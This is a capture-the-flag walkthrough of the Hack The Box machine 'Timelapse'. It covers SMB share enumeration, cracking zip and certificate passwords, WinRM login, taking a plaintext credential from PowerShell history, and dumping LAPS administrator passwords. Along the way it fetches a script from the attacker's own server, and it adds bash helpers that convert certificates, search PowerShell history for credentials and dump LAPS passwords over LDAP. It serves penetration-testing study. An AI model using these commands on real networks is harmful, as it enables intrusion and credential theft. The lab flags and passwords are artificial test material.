Timelapse

Recon

nmap_scan.log
Open 10.129.227.113:53
Open 10.129.227.113:88
Open 10.129.227.113:135
Open 10.129.227.113:139
Open 10.129.227.113:389
Open 10.129.227.113:445
Open 10.129.227.113:464
Open 10.129.227.113:3269
Open 10.129.227.113:3268
Open 10.129.227.113:636
Open 10.129.227.113:593
Open 10.129.227.113:5986
Open 10.129.227.113:9389
Open 10.129.227.113:49667
Open 10.129.227.113:49678
Open 10.129.227.113:49677
Open 10.129.227.113:49699
Open 10.129.227.113:60129
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.227.113

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-12-08 21:43:26Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5986/tcp  open  ssl/http      syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2024-12-08T21:44:57+00:00; +8h00m08s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after:  2022-10-25T14:25:29
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49677/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         syn-ack Microsoft Windows RPC
49699/tcp open  msrpc         syn-ack Microsoft Windows RPC
60129/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 38738/tcp): CLEAN (Timeout)
|   Check 2 (port 6156/tcp): CLEAN (Timeout)
|   Check 3 (port 43455/udp): CLEAN (Timeout)
|   Check 4 (port 38076/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2024-12-08T21:44:16
|_  start_date: N/A
|_clock-skew: mean: 8h00m07s, deviation: 0s, median: 8h00m07s

SMB

A true null session (empty user and empty password) is rejected, but the DC lets a nonexistent username log on with an empty password (an anonymous/guest-style session), and that is enough to list the shares.

└─$ netexec smb 10.129.227.113 -u 'anonymous' -p ''  --shares
SMB         10.129.227.113  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         10.129.227.113  445    DC01             [+] timelapse.htb\anonymous:
SMB         10.129.227.113  445    DC01             [*] Enumerated shares
SMB         10.129.227.113  445    DC01             Share           Permissions     Remark
SMB         10.129.227.113  445    DC01             -----           -----------     ------
SMB         10.129.227.113  445    DC01             ADMIN$                          Remote Admin
SMB         10.129.227.113  445    DC01             C$                              Default share
SMB         10.129.227.113  445    DC01             IPC$            READ            Remote IPC
SMB         10.129.227.113  445    DC01             NETLOGON                        Logon server share
SMB         10.129.227.113  445    DC01             Shares          READ
SMB         10.129.227.113  445    DC01             SYSVOL                          Logon server share

Dump the share

└─$ netexec smb 10.129.227.113 -u 'anonymous' -p '' -M spider_plus -o DOWNLOAD_FLAG=True
SPIDER_PLUS 10.129.227.113  445    DC01             [+] Saved share-file metadata to "/tmp/nxc_spider_plus/10.129.227.113.json".
└─$ mv /tmp/nxc_spider_plus/10.129.227.113/Shares/Dev/winrm_backup.zip .
└─$ unzip winrm_backup.zip -d winrm_backup
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
   skipping: legacyy_dev_auth.pfx    incorrect password

It's password protected

└─$ zip2john winrm_backup.zip > winrm_backup.hash
---
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
---
└─$ unzip winrm_backup.zip -d winrm_backup
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
  inflating: winrm_backup/legacyy_dev_auth.pfx
└─$ pfx2john legacyy_dev_auth.pfx > legacyy_dev_auth.hash
---
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
thuglegacy       (legacyy_dev_auth.pfx)

Not much to do with the archive itself, but it is a WinRM backup, so the certificate is presumably meant for authenticating to WinRM. evil-winrm supports certificate authentication, but it wants a separate PEM certificate and private key, and all we have is the .pfx bundle.

└─$ evil-winrm -h | grep cert
    -c, --pub-key PUBLIC_KEY_PATH    Local path to public key certificate
    -k, --priv-key PRIVATE_KEY_PATH  Local path to private key certificate

Extracting the certificate and key from the .pfx. openssl prompts for the PKCS#12 password cracked above (thuglegacy). -nocerts writes the private key PEM-encrypted under a new passphrase, which is why the third command re-exports it decrypted; -clcerts -nokeys writes only the client certificate.

└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
└─$ openssl rsa -in legacyy_dev_auth.key -out legacyy_dev_auth.decrypted.key
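As an added example (my code, not from the writeup), the same extraction as a shell function: it takes the cracked PKCS#12 password on the command line instead of at a prompt, falls back to OpenSSL 3's -legacy provider when the bundle uses the old RC2-40/3DES wrapping that Windows still exports (OpenSSL 3 otherwise fails with an "unsupported" error), writes the key already decrypted, and checks that the key actually matches the certificate before you spend a login attempt on it. The file names and the password in the usage comment are the ones from this box; the function itself assumes nothing about them.

```bash
#!/usr/bin/env bash
# pfx_to_pem: split a PKCS#12 bundle into the PEM certificate and the
# unencrypted PEM key that evil-winrm's -c / -k options expect, and check
# that the two belong together before trying them against the target.
#   $1 = pfx file   $2 = pfx password   $3 = output basename ($3.crt, $3.key)
pfx_to_pem() {
    local pfx=$1 pass=$2 out=$3 legacy='' cert_pub key_pub
    # OpenSSL 3 refuses the RC2-40/3DES wrapping Windows still uses when it
    # exports a .pfx unless the legacy provider is loaded with -legacy.
    if ! openssl pkcs12 -in "$pfx" -passin "pass:$pass" -noout 2>/dev/null; then
        legacy='-legacy'
    fi
    # -clcerts: only the end-entity certificate, no CA chain; piping through
    # x509 drops the "Bag Attributes" preamble so the file is plain PEM.
    openssl pkcs12 $legacy -in "$pfx" -passin "pass:$pass" -clcerts -nokeys \
        | openssl x509 -out "$out.crt" || return 1
    # -nodes writes the key unencrypted, which replaces the separate
    # `openssl rsa` round trip; pkey rewrites it as a clean PEM file.
    openssl pkcs12 $legacy -in "$pfx" -passin "pass:$pass" -nocerts -nodes \
        | openssl pkey -out "$out.key" || return 1
    chmod 600 "$out.key"
    # The public key derived from the private key must equal the one in the
    # certificate; a mismatch means the bundle was assembled from different keys.
    cert_pub=$(openssl x509 -in "$out.crt" -noout -pubkey | openssl sha256)
    key_pub=$(openssl pkey -in "$out.key" -pubout | openssl sha256)
    [ "$cert_pub" = "$key_pub" ]
}

# pfx_cert_info: show what the certificate is good for. WinRM maps a client
# certificate to an account through the UPN in its subjectAltName, and the
# listener only accepts it if it carries the Client Authentication EKU.
pfx_cert_info() {
    openssl x509 -in "$1" -noout -subject -dates -ext subjectAltName,extendedKeyUsage 2>/dev/null \
        || openssl x509 -in "$1" -noout -subject -dates -text
}

# Usage against the files from the box (thuglegacy is the cracked pfx password):
#   pfx_to_pem legacyy_dev_auth.pfx thuglegacy legacyy_dev_auth \
#       && pfx_cert_info legacyy_dev_auth.crt \
#       && evil-winrm -i 10.129.227.113 -k legacyy_dev_auth.key -c legacyy_dev_auth.crt -S
```

The modulus comparison is the step worth keeping even when you do this by hand: a .pfx can carry a certificate chain plus a key that belongs to none of them, and evil-winrm's error in that case is no more helpful than a plain authentication failure.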

WinRM

WinRM listens on 5985 (HTTP) by default; here only 5986, the HTTPS listener, is open. Without -S evil-winrm uses the plain-HTTP transport, which only does user/password authentication, so the certificate is ignored and it aborts asking for a user. With -S the certificate is presented over TLS and we land as legacyy.

└─$ evil-winrm -i 10.129.227.113 -k legacyy_dev_auth.decrypted.key -c legacyy_dev_auth.crt
/usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection_opts.rb:71:in `validate_required_fields`: user is a required option (RuntimeError)
└─$ evil-winrm -i 10.129.227.113 -k legacyy_dev_auth.decrypted.key -c legacyy_dev_auth.crt -S
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami /all

User Name         SID
================= ============================================
timelapse\legacyy S-1-5-21-671920749-559770252-3318990721-1603

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Development                       Group            S-1-5-21-671920749-559770252-3318990721-3101 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

User.txt

*Evil-WinRM* PS C:\Users\legacyy\Documents> cat ../Desktop/user.txt
3dc5fa1dba22385a4330ce1c13cb70b9

Privilege Escalation

Get-History and the on-disk history show two different things: Get-History only covers the current session (here just evil-winrm's Invoke-Expression wrappers), while PSReadLine's ConsoleHost_history.txt persists every interactive command the user has typed, across sessions, in plain text under their profile. That is where a credential typed at the prompt ends up.

*Evil-WinRM* PS C:\Users\legacyy> Get-History
  Id CommandLine
  -- -----------
   1 Invoke-expression
   2 Invoke-expression
   3 Invoke-expression
   ...
*Evil-WinRM* PS C:\Users\legacyy> Get-Content "$ENV:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
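Added example, not part of the writeup: a small hunt over a PSReadLine history file copied off the box (evil-winrm's download command will fetch it), flagging the command shapes that usually carry a credential, so the same check can be run over every profile whose ConsoleHost_history.txt you can read. The history lines in SAMPLE_HISTORY are constructed for the demo and the pattern list is mine.

```bash
#!/usr/bin/env bash
# scan_ps_history: grep a PSReadLine history file for commands that usually
# put a secret on the command line. Unlike Get-History, this file is written
# to disk per user and survives across sessions, so pull it from every
# profile you can read:
#   C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Extended regexes, one alternative per credential-bearing command shape.
CRED_PATTERNS='ConvertTo-SecureString.*-AsPlainText|PSCredential|net use .*/user:|cmdkey .*/pass|-[Pp]assword( |:)|runas .*/user:'

# Print matching lines prefixed with their line number in the history file.
scan_ps_history() {
    grep -nE "$CRED_PATTERNS" "$1" || true
}

# Number of suspicious lines, for triage across many profiles.
count_cred_hits() {
    scan_ps_history "$1" | wc -l | tr -d ' '
}

# Constructed sample history (not the box's real file); quoted heredoc keeps
# the PowerShell $variables literal.
SAMPLE_HISTORY=$(cat <<'EOF'
whoami
ipconfig /all
$p = ConvertTo-SecureString 'Sup3rS3cret!' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_x', $p)
net use \\fs01\share /user:corp\backup Winter2024!
Get-ADUser -Filter * -Properties *
cmdkey /add:dc01 /user:admin /pass:Hunter2
exit
EOF
)

# Demo: write the sample to a temp file and scan it.
sample_file=$(mktemp)
printf '%s\n' "$SAMPLE_HISTORY" > "$sample_file"
scan_ps_history "$sample_file"
```

Four of the eight sample lines are flagged (the SecureString, the PSCredential construction, net use and cmdkey); the PSCredential line matters even without a literal password in it, because it tells you which variable to look for.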
└─$ evil-winrm -i 10.129.227.113 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /all
User Name            SID
==================== ============================================
timelapse\svc_deploy S-1-5-21-671920749-559770252-3318990721-3103

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers                      Group            S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

https://exploit-notes.hdks.org/exploit/windows/active-directory/laps-pentesting/
https://www.netexec.wiki/winrm-protocol/defeating-laps

netexec failed 🤔

└─$ curl -LOs https://github.com/kfosaaen/Get-LAPSPasswords/raw/refs/heads/master/Get-LAPSPasswords.ps1
└─$ serve
---
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> curl 10.10.14.113/Get-LAPSPasswords.ps1 -out laps.ps1
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> .\laps.ps1
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-LAPSPasswords
Hostname   : dc01.timelapse.htb
Stored     : 1
Readable   : 1
Password   : x/4(&DEjBZ+06${2{EpZ&Sqi
Expiration : 12/13/2024 1:35:32 PM

Note: 2.70 Attribute ms-Mcs-AdmPwd
The script does nothing more than read ms-Mcs-AdmPwd (the cleartext local Administrator password) and ms-Mcs-AdmPwdExpirationTime from each computer object over LDAP; membership in LAPS_Readers grants read on that attribute, and that is the whole gap between svc_deploy and Administrator.
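Added example, not the writeup's method and not the Get-LAPSPasswords script: reading ms-Mcs-AdmPwd straight from LDAP with ldapsearch from the attacker box, which is exactly the read LAPS_Readers is granted, plus the conversion of ms-Mcs-AdmPwdExpirationTime from a Windows FILETIME to a UTC timestamp. The LDIF in SAMPLE_LDIF is constructed (passwords included) in the shape ldapsearch -LLL returns; the host, account and base DN in the usage comment come from the page.

```bash
#!/usr/bin/env bash
# LAPS password retrieval as an authenticated LDAP read of ms-Mcs-AdmPwd and
# ms-Mcs-AdmPwdExpirationTime on every computer object, run from the attacker box.

# ms-Mcs-AdmPwdExpirationTime is a Windows FILETIME: 100 ns ticks since
# 1601-01-01. Shell arithmetic is 64-bit, so no external tool is needed.
filetime_to_epoch() {
    printf '%d\n' $(( ($1 - 116444736000000000) / 10000000 ))
}

# Read ldapsearch LDIF on stdin, emit "dn<TAB>password<TAB>expiration" per entry
# that carries a password. Handles the two LDIF details naive greps miss:
#   - long values are folded at 76 columns; continuation lines start with a space
#   - values with a leading space or non-printables are base64 ("attr:: ...")
laps_parse_ldif() {
    awk '
        /^ /  { buf = buf substr($0, 2); next }
              { if (have) print buf; buf = $0; have = 1 }
        END   { if (have) print buf }
    ' | {
        dn=''; adm_pwd=''; expiry=''
        while IFS= read -r line || [ -n "$line" ]; do
            case "$line" in
                '')
                    if [ -n "$adm_pwd" ]; then printf '%s\t%s\t%s\n' "$dn" "$adm_pwd" "$expiry"; fi
                    dn=''; adm_pwd=''; expiry='' ;;
                'dn: '*)                          dn=${line#dn: } ;;
                'ms-Mcs-AdmPwd:: '*)              adm_pwd=$(printf '%s' "${line#ms-Mcs-AdmPwd:: }" | base64 -d) ;;
                'ms-Mcs-AdmPwd: '*)               adm_pwd=${line#ms-Mcs-AdmPwd: } ;;
                'ms-Mcs-AdmPwdExpirationTime: '*) expiry=${line#ms-Mcs-AdmPwdExpirationTime: } ;;
            esac
        done
        if [ -n "$adm_pwd" ]; then printf '%s\t%s\t%s\n' "$dn" "$adm_pwd" "$expiry"; fi
    }
}

# Pretty-print parser output with the expiry as a UTC timestamp
# (falls back to the raw epoch where date lacks GNU's -d).
laps_report() {
    while IFS=$(printf '\t') read -r dn adm_pwd expiry; do
        epoch=$(filetime_to_epoch "$expiry")
        when=$(date -u -d "@$epoch" '+%Y-%m-%dT%H:%M:%SZ' 2>/dev/null || echo "epoch $epoch")
        printf 'host:     %s\npassword: %s\nexpires:  %s\n\n' "$dn" "$adm_pwd" "$when"
    done
}

# Live query. A simple bind sends the password, so use LDAPS (636 is open on
# this DC) or add -ZZ for StartTLS on 389. If the DC presents a self-signed
# certificate, as its WinRM listener does, export LDAPTLS_REQCERT=never or
# import it first. Computers whose password you cannot read simply come back
# without the attribute, so the parser skips them.
#   laps_dump 10.129.227.113 'svc_deploy@timelapse.htb' 'E3R$Q62^12p7PLlC%KWaxuaV' 'DC=timelapse,DC=htb'
laps_dump() {
    ldapsearch -x -LLL -H "ldaps://$1" -D "$2" -w "$3" -b "$4" \
        '(objectClass=computer)' ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime \
    | laps_parse_ldif | laps_report
}

# Constructed LDIF in the shape ldapsearch -LLL returns (not a capture from the
# box): one plain value, one folded DN, one base64 value with a leading space.
SAMPLE_LDIF='dn: CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
ms-Mcs-AdmPwd: 7Q]h+2Kp!w9#Zt{Vm,3Bx&Rs
ms-Mcs-AdmPwdExpirationTime: 133785705320000000

dn: CN=WS01,CN=Computers,DC=timelapse,
 DC=htb
ms-Mcs-AdmPwd:: IExlYWRpbmdTcGFjZVB3ZA==
ms-Mcs-AdmPwdExpirationTime: 133785705320000000'

printf '%s\n' "$SAMPLE_LDIF" | laps_parse_ldif | laps_report
```

The FILETIME 133785705320000000 in the sample decodes to 2024-12-13T13:35:32Z; compare that with what Get-LAPSPasswords printed, which is in the DC's local time (the scanner clock skew of eight hours from the nmap output is the reminder to do that).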

Root.txt

└─$ evil-winrm -i 10.129.227.113 -u 'administrator' -p 'x/4(&DEjBZ+06${2{EpZ&Sqi' -S
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
Cannot find path 'C:\Users\Administrator\Desktop\root.txt' because it does not exist.
*Evil-WinRM* PS C:\Users> ls -rec -fil root.txt | %{$_.FullName;cat $_.FullName}
C:\Users\TRX\Desktop\root.txt
92397df9fb849fb66e9615a704d2a2a7
